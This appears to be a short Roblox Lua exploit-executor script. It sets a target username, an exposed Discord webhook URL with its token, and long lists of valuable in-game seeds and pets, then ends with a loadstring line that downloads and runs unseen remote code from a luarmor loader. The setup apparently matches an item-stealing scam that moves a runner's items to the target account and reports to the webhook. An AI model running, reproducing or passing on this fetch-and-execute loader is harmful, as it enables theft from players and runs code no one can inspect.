getgenv().NORMAL_TARGET     = "STARTRADES23"
getgenv().NORMAL_WEBHOOK_URL = "https://discord.com/api/webhooks/1486106523552972850/ablqeDTfcsitrX-iZBZq-kDl5GYNu_mRL_X6Eg47wlTxgKkhMHyNRDLStyQ0b1EDi1wt"
getgenv().NORMAL_SEEDS = {
    ["Moon Bloom"] = true,
    ["Dragon's Breath"] = true,
    ["Rainbow Seed"] = true,
    ["Venus Fly Trap"] = true,
    ["Pomegranate"] = true,
    ["Poison Apple"] = true,
    ["Ghost Pepper"] = true,
    ["Gold Seed"] = true,
    ["Dragon Fruit"] = true,
    ["Acorn"] = true,
    ["Cherry"] = true,
    ["Sunflower"] = true,
    ["Poison Ivy"] = true,
    ["Mushroom"] = true,
    ["Green Bean"] = true,
    ["Banana"] = true,
    ["Grape"] = true,
    ["Coconut"] = true,
    ["Mango"] = true,
    ["Glow Mushroom"] = true,
    ["Bamboo"] = true,
    ["Corn"] = true,
    ["Cactus"] = true,
    ["Pineapple"] = true,
    ["Baby Cactus"] = true,
    ["Horned Melon"] = true,
    ["Tulip"] = true,
    ["Tomato"] = true,
    ["Apple"] = true,
    ["Carrot"] = true,
    ["Strawberry"] = true,
    ["Blueberry"] = true
}
getgenv().NORMAL_PETS = {
    ["Raccoon"] = true,
    ["Unicorn"] = true,
    ["Golden Dragonfly"] = true,
    ["Robin"] = true,
    ["Bee"] = true,
    ["Deer"] = true,
    ["Owl"] = true,
    ["Bunny"] = true,
    ["Frog"] = true,
    ["Monkey"] = true,
    ["Ice Serpent"] = true,
    ["Black Dragon"] = true
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/22c796a75f035b5ef8e55946d39e602c.lua"))()
